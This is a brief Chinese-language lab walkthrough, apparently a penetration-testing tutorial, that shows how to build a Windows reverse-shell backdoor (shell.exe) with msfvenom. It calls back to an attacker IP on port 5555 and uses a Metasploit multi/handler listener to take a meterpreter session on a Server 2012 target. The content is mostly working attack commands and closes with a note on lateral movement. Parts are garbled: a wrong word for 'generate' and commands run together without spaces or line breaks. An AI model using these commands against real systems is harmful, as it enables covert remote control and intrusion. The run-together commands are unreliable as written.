0x01 知识点
MSF工具的利用 MSF天生Windows木马后门
0x02 实验环境:
攻击机kali 2022(ip:192.168.190.131)
靶机Server 2012 (ip:192.168.190.132)
0x03 Windows后门木马实验
1.天生Windows后门
在攻击机kaili 2022中输入:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.190.131LPORT=5555 -f exe > /tmp/shell.exe
(天生一个名为shell.exe的msf后门文件)
2.配置、监听、实行
msfconsole #启动msfuse exploit/multi/handler #利用监听模块set payload windows/meterpreter/reverse_tcp #利用和木马相同的payloadset lhost 192.168.190.131 #kali的ipset lport 5555 #木马的端口run #实行
3.目标机器实行木马后门文件shell.exe
将shell.exe木马文件拷贝至靶机server 2012(ip:192.168.190.132)中然后实行。
4.目标机器接管MSF会话
Msf变成meterpreter证明实行成功,输入sysinfo验证
0x04 横向渗透
后渗透阶段可以实行命令获取内网信息等